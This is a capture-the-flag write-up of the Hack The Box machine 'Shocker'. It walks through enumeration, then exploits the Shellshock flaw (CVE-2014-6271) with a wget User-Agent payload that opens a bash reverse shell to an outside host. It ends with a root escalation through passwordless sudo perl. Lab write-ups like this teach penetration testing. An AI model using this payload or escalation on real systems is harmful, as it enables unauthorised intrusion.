HTB-Shocker
An OSCP like linux-based box with the difficulty level easy.
Box overview
This box is based on http shellshock vulnerability aka CVE-2014-6271. This vulnerability was discovered in bash version 1.0.3 – 4.3. Shellshock was a critical security bug that allows an attacker to execute arbitrary commands. Vulnerable versions of bash executes the command mentioned after the function definition that are stored in environment variables.
This box requires an enumeration of fine degree in addition to little bit observation to gain the initial footholds. Without any further due, lets dive into the box and begin with enumeration phase.
Enumeration
Initiating nmap scan to find the open ports and running services. Running a quick nmap scan i.e. nmap 10.10.10.56
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1 From the quick nmap scan, we discovered two open ports with running services. Lets run another scan to get detailed information about those service. Running nmap scan for fingerprinting services i.e. nmap -sC -sV -p80,2222 10.10.10.56
Command explanation:
nmap: to initiate the nmap command
-sC: to run the default scripts
-sV: to find out the service's versions
-p: to specify the port numbersOutput of above command:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelShort notes derived from the above result.
- On port 80, Apache http server of version 2.4.18 is running. This version of apache server is not vulnerable to any sensitive security vulnerability which could land us to arbitrary code execution.
- On port 2222, there’s a ssh service running of version OpenSSH 7.2p2, which provides an command line interface to the user to interact with the machine. But to start with ssh, we will be requiring valid credentials to get into the system but unfortunately we don’t have any at the moment.
- Also observed that the target machine is running on ubuntu OS.
Lets check what is happening on port 80.
On the homepage, there’s only a cartoon saying Don’t Bug Me!
Looked into the source code of the homepage but found nothing interesting to proceed with.
Not much information revealed from the nmap scan. Lets try directory brute forcing. We will be using gobuster for directory brute forcing i.e. gobuster dir --url http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt -t 100
Command explanation:
gobuster: to initiate the command
dir: set gobuster at directory/files enumeration mode
--url: to specify the url
-w: to specify the wordlist
-t: to assign the number of concurrent threads Output of above command:
/.hta (Status: 403) [Size: 290]
/.htaccess (Status: 403) [Size: 295]
/.htpasswd (Status: 403) [Size: 295]
/cgi-bin/ (Status: 403) [Size: 294]
/index.html (Status: 200) [Size: 137]
/server-status (Status: 403) [Size: 299]Here we got the result of the gobuster run, we found some new directory i.e. /cgi-bin/ Visited this directory in the browser…
After doing some research about /cgi-bin/ , found that it is a folder used to store scripts that interacts with the web browser to provide functionality for a webpage or website. Also encountered that a vulnerability is associated with this /cgi-bin/ directory i.e. http shellshock vulnerability aka CVE-2014-6271.
It could be a good injection point but we have to make sure whether our target is vulnerable to this vulnerability or not. On researching about the same, I came across this article Exploiting CGI Scripts with Shellshock . This article greatly explains how to exploit shellshock vulnerability.
In order to check if our target is vulnerable, we will be requiring a bash script on the target machine but we don’t have any idea if there is any script is there. For that, we will be using gobuster again for file brute forcing i.e.
gobuster dir --url http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x .sh -t 100
Command explanation:
gobuster: to initiate the command
dir: to specify file/directory enumeration mode
--url: to specify the url
-w: to specify the wordlist
-x: to specify the extension of the file we required(.sh)
-t: to assign the number of concurrent threads Output of the above command:
/.hta (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 303]
/.htaccess.sh (Status: 403) [Size: 306]
/.hta.sh (Status: 403) [Size: 301]
/.htpasswd.sh (Status: 403) [Size: 306]
/user.sh (Status: 200) [Size: 118]Found a new file user.sh in /cgi-bin/ directory. Now we are checking if the target is vulnerable to shellshock. We will be doing this using nmap’s http-shellshock.nse script i.e.
nmap -sV -p80 --script=http-shellshock.nse --scripts-args uri=/cgi-bin/user.sh 10.10.10.56
Command explanation:
nmap: to initiate the command
-sV: to fingerprint the service's version
--script= to specify the script name
--script-args to specify the scripts arguments
uri= script argumentOutput of above command:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
| http://seclists.org/oss-sec/2014/q3/685
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.18 (Ubuntu)The above output shows that our target is vulnerable to shellshock vulnerability. Now, we need to exploit it to gain the access on the server.
We will be exploiting this by sending a manipulated header request using wget utility…
wget -q -U "() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1" http://10.10.10.56/cgi-bin/user.shCommand explanation:
wget: to initiate the command
-q: to turn off wget's output
-U: to specify the user-agent string
--------------------------------------------------------------------
"() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1"- () { :;} ---> function definition
- echo Content-type: text/html ---> specifying content type
- echo; echo ---> to leave blank lines
- /bin/bash -i ---> to launch bash in interactive mode
- >& /dev/tcp/10.10.14.2/9000 ---> cast standard output directly into the assigned ip & port
But before executing the above command start the netcat listener to get the reverse shell.
Now, once we execute the above command we will get a reverse shell in netcat listener terminal.
In the above screenshot, three actions are done as follows:
- Started a netcat listener at right side using
nc -lvp 9000 - At the left side, execute the command i.e.
wget -q -U "() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1" http://10.10.10.56/cgi-bin/user.sh- At the right side, we got the shell…..
The achieved shell is not stable therefore we need to move on to a more stable shell. We will be spawning a shell using python3 i.e.
python3 -c 'import pty; pty.spawn("/bin/sh")'
So far, we got a shell of user shelly Now we can read the user.txt file to get out user flag.
Now we are heading to root user. For that we recon in our existing shell and will figure out how to get root access.
Found a binary /usr/bin/perl which can be executed as sudo but require no password. It means we can execute any sudo command using this binary even without knowing the password. Lets try to make syscall using this binary.
Here we got the root shell using sudo /usr/bin/perl -e 'exec "/bin/bash"'
Now we can get root flag…
